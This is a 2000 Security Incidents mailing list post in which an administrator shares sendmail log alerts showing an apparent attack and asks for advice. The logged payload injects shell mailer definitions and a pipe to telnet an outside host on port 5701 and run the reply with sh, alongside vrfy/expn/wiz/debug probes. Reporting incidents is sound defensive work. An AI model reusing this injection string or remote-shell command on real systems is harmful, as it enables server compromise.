Security Incidents mailing list archives
sendmail attack?
From: C <claudiu.ionescu () SCALAJWT RO>
Date: Thu, 14 Dec 2000 09:45:15 +0200
Hi all, My logcheck come up with the following: Active System Attack Alerts =-=-=-=-=-=-=-=-=-=-=-=-=-= Dec 9 00:43:01 main sendmail[809]: NOQUEUE: POSSIBLE ATTACK from Dial22.xxx.xxx: newline in string "iss^M Croot^M Mprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u^M Mlocal, P=/bin/sh, F=lsDFMeu, A=sh -c $u^M R<"|/... Vulnerable | mail ">^M R<"|( sleep 2 ; echo quit ) |telnet xxx.xxx.xxx.xxx 5701 | sh
/tmp/tel.out "
Dec 9 01:01:05 main sendmail[856]: NOQUEUE: Dial22.xxx.xxx [xxx.xxx.xxx.xxx]: vrfy root Dec 9 01:01:06 main sendmail[857]: NOQUEUE: Dial22.xxx.xxx [xxx.xxx.xxx.xxx]: expn root Dec 9 01:01:06 main sendmail[858]: NOQUEUE: Dial22.xxx.xxx [xxx.xxx.xxx.xxx]: expn decode Dec 9 01:01:19 main sendmail[860]: NOQUEUE: "wiz" command from Dial22.xxx.xxx [xxx.xxx.xxx.xxx] (xxx.xxx.xxx.xxx) Dec 9 01:01:24 main sendmail[863]: BAA00863: "debug" command from Dial22.xxx.xxx [xxx.xxx.xxx.xxx] (xxx.xxx.xxx.xxx) Dec 9 00:43:01 main sendmail[809]: NOQUEUE: POSSIBLE ATTACK from Dial22.xxx.xxx: newline in string "iss^M Croot^M Mprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u^M Mlocal, P=/bin/sh, F=lsDFMeu, A=sh -c $u^M R<"|/... Vulnerable | mail ">^M R<"|( sleep 2 ; echo quit ) |telnet xxx.xxx.xxx.xxx 5701 | sh
/tmp/tel.out "
Dec 9 01:01:05 main sendmail[856]: NOQUEUE: Dial22.xxx.xxx [xxx.xxx.xxx.xxx]: vrfy root Dec 9 01:01:06 main sendmail[857]: NOQUEUE: Dial22.xxx.xxx [xxx.xxx.xxx.xxx]: expn root Dec 9 01:01:06 main sendmail[858]: NOQUEUE: Dial22.xxx.xxx [xxx.xxx.xxx.xxx]: expn decode Dec 9 01:01:19 main sendmail[860]: NOQUEUE: "wiz" command from Dial22.xxx.xxx [xxx.xxx.xxx.xxx] (xxx.xxx.xxx.xxx) Dec 9 01:01:24 main sendmail[863]: BAA00863: "debug" command from Dial22.xxx.xxx [xxx.xxx.xxx.xxx] (xxx.xxx.xxx.xxx) =-=-=-=-=-=-=-=-=-=-=-=-=-=- Obviously is a sendmail attack try. Any suggestions, comments ?
Current thread:
- sendmail attack? C (Dec 15)
- Re: sendmail attack? Al Huger - Mail Account (Dec 15)